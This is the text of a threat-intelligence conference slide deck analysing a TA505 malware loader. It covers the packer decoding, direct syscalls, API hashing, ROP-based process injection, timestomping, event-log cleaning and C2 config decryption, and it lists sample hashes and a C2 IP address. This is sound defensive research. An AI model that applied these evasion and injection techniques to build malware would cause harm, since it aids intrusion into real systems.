mlw #41: a new sophisticated loader by apt group ta505 #41: a new... · • speaker at infosec...
TRANSCRIPT
![Page 1: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/1.jpg)
ptsecurity.com
Mlw #41: a new
sophisticated loader
by APT group TA505
Alexey Vishnyakov
![Page 2: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/2.jpg)
ptsecurity.com
• Senior Specialist at Expert Security Center
• Threat Intelligence
• APT analysis
• Incident response support
• Speaker at infosec conferences (PHDays, AVAR)
Twitter: @Vishnyak0v
![Page 3: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/3.jpg)
Agenda
• Intro
• PE packer
• Prep stage
• Persistence stage
• Payload stage
• C&C plugin stage
• Conclusion
![Page 4: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/4.jpg)
Intro
A few words about group
and sample
![Page 5: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/5.jpg)
Intro
TA505 cybercriminal group
• Since 2014
• More then half of the world targeted
• Huge toolkit: Dridex, Locky, ServHelper and dozens of other families
• Relations with other threat actors: Buhtrap, Silence
![Page 6: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/6.jpg)
Intro
APT?
Sometimes … yes
![Page 7: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/7.jpg)
Intro
• File size: 287440 bytes
• PE32 executable for MS Windows (console) Intel 80386 32-bit
• Microsoft Visual C++
• MD5: 58a875aeaa00ddb684349446ec9d36af
• SHA1: f6d3545a962e88e31365d9218460381d5265025d
• SHA256: d19a8ebbcd0dd9f1f438ac04d510270a135ba4c0c59f3f5eb92ae7e4ea5d8f71
• Imphash: e58e198778a2bd20fd323a8924987ccf
• SSDEEP: 6144:7xohcLcBrQsCSQ+Rd1f4kdn6PAScLl14aG3wUhJzM6rG8mb7+:7s5+sCcLdKM/6r3mbq
![Page 8: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/8.jpg)
Intro
![Page 9: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/9.jpg)
PE packer
First part:
TA505 related packer
![Page 10: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/10.jpg)
PE packer
Useless
instructions before
the main logic
![Page 11: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/11.jpg)
PE packer
“SUB-XOR-ROL7-XOR”
decoding routine
![Page 12: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/12.jpg)
PE packer
Shellcode execution
struct ShellcodeArgs {
HMODULE hkernel32;
void *aEncodedBlob;
unsigned int nEncodedBlobSize;
unsigned int nBlobMagic;
unsigned int nBlobSize;
};
![Page 13: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/13.jpg)
PE packer
Second stage shellcode at the beginning
![Page 14: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/14.jpg)
PE packer
Payload reduction “from
5 to 3 bytes”
“SUB-XOR-ROL7-XOR”
decoding again
![Page 15: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/15.jpg)
PE packer
aPLib decompression
(see FSG packer)
![Page 16: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/16.jpg)
PE packer
Self-entry point
replacement in PEB
![Page 17: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/17.jpg)
PE packer
Second part:
Custom packer
![Page 18: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/18.jpg)
PE packer
C:\_SHARED\mlw41_DNSG\c_drop\Release\c_drop.pdb
![Page 19: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/19.jpg)
PE packer
Custom XOR-based algorithm
![Page 20: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/20.jpg)
PE packer
LZNT1 decompression
Compressed PE
![Page 21: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/21.jpg)
Prep stage
Reconnaissance, DLL
imports, configuration
![Page 22: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/22.jpg)
Prep stage
Self name: pld32.dll
One exported function for
relocation purposes
![Page 23: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/23.jpg)
Prep stage
Determining OS version with
using
KUSER_SHARED_DATA
structure
![Page 24: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/24.jpg)
Prep stage
https://www.geoffchap
pell.com/studies/wind
ows/km/ntoskrnl/struc
ts/kuser_shared_data
/index.htm
![Page 25: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/25.jpg)
Prep stage
Bytes array: function offsets in SDT
![Page 26: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/26.jpg)
Prep stage
eax ==
KeServiceDescriptorTable
index
![Page 27: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/27.jpg)
Prep stage
# 2-bytes value API
0 15 00 NtAllocateVirtualMemory
1 1B 00 NtFreeVirtualMemory
2 52 00 NtCreateFile
3 0C 00 NtClose
4 03 00 NtReadFile
5 0E 00 NtQueryInformationFile
6 4F 00 NtResumeThread
7 50 01 NtSetContextThread
How it looked like in my VM
# 2-bytes value API
8 25 00 NtMapViewOfSection
9 47 00 NtCreateSection
10 34 00 NtOpenSection
11 30 00 NtOpenFile
12 4D 00 NtProtectVirtualMemory
13 33 00 NtQuerySystemInformation
14 3A 00 NtQueryAttributesFile
15 27 00 NtUnmapViewOfSection
![Page 28: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/28.jpg)
Prep stage
FastSysCall in Wow64
Is it x86?
Direct function
invocation via syscall
![Page 29: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/29.jpg)
Prep stage
IMHO: quality in the details
![Page 30: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/30.jpg)
Prep stage
Auxiliary DLLs reading
via fast syscalls
![Page 31: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/31.jpg)
Prep stage
DLL export table
parsing
![Page 32: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/32.jpg)
Prep stage
Function hash calculation algorithm
![Page 33: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/33.jpg)
Prep stage
Resolving function
addresses for
predefined
libraries via
hashes
![Page 34: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/34.jpg)
Prep stage
Function hashes
![Page 35: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/35.jpg)
Prep stage
IDA Python script for
functions resolving, part 1
[Hashes count, Hashes array
, Addresses array]
![Page 36: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/36.jpg)
Prep stage
IDA Python script for
functions resolving, part 2
![Page 37: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/37.jpg)
Prep stage
Bingo!
![Page 38: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/38.jpg)
Prep stage
Check self name
hash against
blacklist
![Page 39: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/39.jpg)
Prep stage
Get volume info
![Page 40: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/40.jpg)
Prep stage
Check AV and
VM process
names
![Page 41: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/41.jpg)
Prep stage
Self compression & encryption
![Page 42: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/42.jpg)
Prep stage
Final recon & configuration structure
![Page 43: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/43.jpg)
Persistence stage
Shellcode, injects, scripts,
tasks, anti DFIR
![Page 44: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/44.jpg)
Persistence stage
Generate an intermediate shellcode
• 420 bytes
• Hardcoded shellcode
• 532 bytes
• Registry path
• Payload size
• ntdll major APIs relative addresses
![Page 45: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/45.jpg)
Persistence stage
Shellcode
Config
![Page 46: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/46.jpg)
Persistence stage
![Page 47: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/47.jpg)
Persistence stage
![Page 48: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/48.jpg)
Persistence stage
![Page 49: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/49.jpg)
Persistence stage
ZwOpenProcess ->
InitializeProcThreadAttributeList ->
UpdateProcThreadAttribute ->
CreateProcessW
![Page 50: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/50.jpg)
Persistence stage
Prepare thread
context with ROP
gadget in ntdll
![Page 51: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/51.jpg)
Persistence stage
Inject via NtSetContextThread with ROP
![Page 52: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/52.jpg)
Persistence stage
Dropping the script to a system
![Page 53: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/53.jpg)
Persistence stage
Generating ps1 launcher
![Page 54: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/54.jpg)
Persistence stage
Execute it finally
![Page 55: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/55.jpg)
Persistence stage
JScript path construction
![Page 56: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/56.jpg)
Persistence stage
JScript path construction
![Page 57: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/57.jpg)
Persistence stage
JScript creating
MAC times?
![Page 58: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/58.jpg)
Persistence stage
Extracting and assigning MAC timestamps from ntdll (Timestomping)
![Page 59: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/59.jpg)
Persistence stage
AddressBook.js
![Page 60: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/60.jpg)
Persistence stage
Task scheduling via COM interface
![Page 61: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/61.jpg)
Persistence stage
Event log cleaning
![Page 62: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/62.jpg)
Payload stage
Remember?
It’s just a loader…
![Page 63: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/63.jpg)
Payload stage
GUID generating,
opening file mapping
![Page 64: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/64.jpg)
Payload stage
Store the payload on disk and execute or …
![Page 65: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/65.jpg)
Payload stage
… inject in msiexec via NtSetContextThread
![Page 66: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/66.jpg)
Payload stage
… inject with LoadLibraryW, wups.dll and splicing
![Page 67: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/67.jpg)
Payload stage
… inject with LoadLibraryW, wups.dll and splicing
![Page 68: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/68.jpg)
Payload stage
Hooked functions
![Page 69: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/69.jpg)
Payload stage
Encrypt and store a payload in registry
![Page 70: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/70.jpg)
C&C plugin stage
C2 interaction, X25
requests, tunneling
![Page 71: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/71.jpg)
C&C plugin stage
Decrypt and launch the plugin
![Page 72: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/72.jpg)
C&C plugin stage
Seems that’s a real timestamp
![Page 73: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/73.jpg)
C&C plugin stage
Encrypted config structure
![Page 74: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/74.jpg)
C&C plugin stage
Encrypted config structure
“check” bytes
![Page 75: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/75.jpg)
C&C plugin stage
Encrypted config structure
“check” bytes RC4 key
![Page 76: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/76.jpg)
C&C plugin stage
Encrypted config structure
“check” bytes RC4 key
config size
![Page 77: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/77.jpg)
C&C plugin stage
Encrypted config structure
“check” bytes RC4 key
config sizeencrypted config
![Page 78: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/78.jpg)
C&C plugin stage
Decrypted config
<a>37.59.52.229</a><b>a12</b><c>zjs4zmhmr2ws</c><d>1</d>
C&C a new RC4 key
![Page 79: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/79.jpg)
C&C plugin stage
Base64 encoding
![Page 80: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/80.jpg)
C&C plugin stage
Symbols replaced in the request
‘+’ -> -11P || -22L
‘/’ -> -33S || -44L
‘=‘ -> -55E || -66Q || -77A || -88L || -99S
![Page 81: Mlw #41: a new sophisticated loader by APT group TA505 #41: a new... · • Speaker at infosec conferences (PHDays, AVAR) Twitter: @Vishnyak0v. Agenda •Intro ... Determining OS](https://reader033.vdocument.in/reader033/viewer/2022060500/5f1a1408abd93c53725f38a1/html5/thumbnails/81.jpg)
C&C plugin stage
Divide data into chunks Split via dots
